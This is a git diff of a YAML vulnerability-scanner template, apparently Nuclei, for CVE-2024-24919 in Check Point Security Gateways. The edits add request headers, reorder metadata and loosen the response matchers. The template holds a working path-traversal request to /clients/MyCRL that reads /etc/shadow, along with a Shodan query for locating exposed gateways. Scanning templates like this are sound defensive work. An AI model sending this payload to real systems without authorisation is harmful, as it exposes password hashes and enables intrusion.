diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 4ed2a49243..70d85637df 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -5,17 +5,17 @@ info: author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: - verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway - shodan-query: html:"Check Point SSL Network" cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + shodan-query: html:"Check Point SSL Network" + verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -23,19 +23,21 @@ http: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7 + Content-Length: 39 + Accept-Encoding: gzip + Connection: close aCSHELL/../../../../../../../etc/shadow - matchers-condition: and matchers: - type: regex part: body regex: - - "root:" - - "nobody:" + - "root:.*" + - "nobody:.*" condition: and - type: status status: - 200 -# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file